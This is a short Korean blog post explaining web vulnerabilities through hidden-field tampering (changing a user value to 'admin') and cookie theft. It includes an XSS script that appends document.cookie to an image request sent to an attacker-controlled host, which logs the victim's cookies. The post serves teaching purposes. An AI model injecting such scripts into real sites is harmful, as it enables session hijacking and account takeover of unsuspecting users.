2017. 3. 2.

[웹 취약점] 쿠키 변조 및 재사용

# 히든 필드 방식

html 태그 정보로 사용자 인증을 처리하는 방식으로, 상품가격과 사용자 추적을 위해 과거에 사용했던 방식, 그러나 사용자 측 스크립트에서 우회 할 수 있는 취약점이 존재함

[HTML 태그 형태]
<INPUT TYPE ="hidden" Name="변수명" Value="Data">
[원래의 히든 필드 값]
<input type=hidden name="user" value="test">
[변조된 히든 필드 값]
<input type=hidden name="user" value="admin">
히든 필드는 웹 브라우저의 정보를 전적으로 신뢰하는 구조이기 때문에 서버 측에서 재검증하지 않는 한 보안 취약점을 가질 수 밖에 없다.


# 쿠키나 세션 가로채기



웹 로그에 사용자 쿠키 혹은 세션 값을 전송하는 예제

<script>document.write("<img src='http://myhomeshop/shop/images/cat_image.jpg?"+document.cookie.+">");</script>

만약 원격지의 그림파일이 공격자의 통제하에 있는 웹 사이트(http://myhomeshop)의 그림이라고 가정해보자. 해당 url을 통해 피해자가 그림을 요청한 흔적과 클릭한 사용자의 쿠키 정보가 함께 웹 로그 파일에 쌓이게 될 것이다.


Popular Posts

Recent Posts

Powered by Blogger.